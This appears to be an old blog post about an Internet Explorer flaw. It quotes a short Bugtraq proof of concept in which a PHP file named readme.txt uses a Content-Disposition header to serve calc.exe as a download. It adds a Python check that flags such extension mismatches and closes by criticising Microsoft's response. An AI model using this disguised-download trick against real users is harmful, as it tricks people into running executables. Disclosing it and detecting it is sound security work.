Apparently, a PHP exploit has been published on Bugtraq more than a week ago that demonstrates the vulnerability:
1. Copy the real windows calc.exe from a windows system to the html root dir.
2. Copy the readme.txt file below to the same html root dir.
3. go to the url http://yourserver/readme.txt
You will see the same behavior mentioned in the previous alert.
FILE <readme.txt> BEGIN ----
<?php
// Tell the browser the download is called calc.exe even though the URL ends in .txt;
// the vulnerable IE acts on this filename instead of the extension in the URL.
header("Content-Disposition: attachment; filename=calc.exe");
// Serve the calc.exe that was copied into the html root dir in step 1.
readfile("calc.exe");
?>
FILE <readme.txt> END ----
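The defender-side counterpart of the PoC above is to flag responses whose Content-Disposition filename extension disagrees with the URL extension, which is exactly what the calc.exe/readme.txt trick relies on. This is an added example (not from the post), suitable for a proxy or log-review script; the header sample, the executable-extension list and the function names are my own assumptions.

```python
import re
from urllib.parse import urlsplit

# Extensions Windows runs directly on open (constructed list for this check; extend as needed).
EXECUTABLE_EXTS = {"exe", "com", "bat", "cmd", "scr", "pif", "vbs", "js", "hta"}

# Matches the plain filename= parameter (the RFC 5987 filename*= form is not handled here).
_FILENAME_RE = re.compile(r'(?<![\w*])filename\s*=\s*"?([^";]+)"?', re.IGNORECASE)


def extension_of(name):
    """Lower-cased extension of the last path component, or '' if there is none."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def content_disposition_filename(headers):
    """Return the filename parameter of a Content-Disposition header, or None."""
    for key, value in headers.items():
        if key.lower() == "content-disposition":
            match = _FILENAME_RE.search(value)
            if match:
                return match.group(1).strip()
    return None


def check_download(url, headers):
    """Classify a response as 'ok', 'mismatch' or 'executable-mismatch'.

    'executable-mismatch' is the case from the post: the URL says one thing
    (readme.txt) while the header names a file type Windows will execute (calc.exe).
    """
    url_ext = extension_of(urlsplit(url).path)
    cd_name = content_disposition_filename(headers)
    if cd_name is None:
        return "ok"
    cd_ext = extension_of(cd_name)
    if cd_ext == url_ext:
        return "ok"
    if cd_ext in EXECUTABLE_EXTS:
        return "executable-mismatch"
    return "mismatch"


if __name__ == "__main__":
    # Constructed sample: the response the readme.txt PoC above would produce.
    sample = {"Content-Disposition": "attachment; filename=calc.exe"}
    print(check_download("http://yourserver/readme.txt", sample))  # executable-mismatch
```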
Unfortunately, Microsoft doesn't consider this a vulnerability; they say that the trust decision should be based on the file source and not the file type. Who can you trust? Hm... that's a hard one, considering that even reputable commercial software vendors have been (accidentally) guilty of distributing virii along with their software... and can you really trust any link on any personal site (such as a journal, weblog, etc.)? Unfortunately, this bug is so sweeping that the issue stops being a matter of trust and becomes a matter of blind faith that we won't be the ones affected. Does this mean that your "friends" can be infected by a virus that will email you with friendly banter and tell you to check out an innocuous-looking link with a "safe" file extension?!
What Microsoft is really asking you to do is trust no one - except them. They refuse to see their great contributions in making the Internet such a dangerous place to be... meanwhile, virii that primarily target their software's security flaws routinely cost people billions of dollars a year.
Until Microsoft starts taking security a lot more seriously and stops pushing the responsibility entirely back on the user, there is only one simple solution to this bug - don't use IE anymore.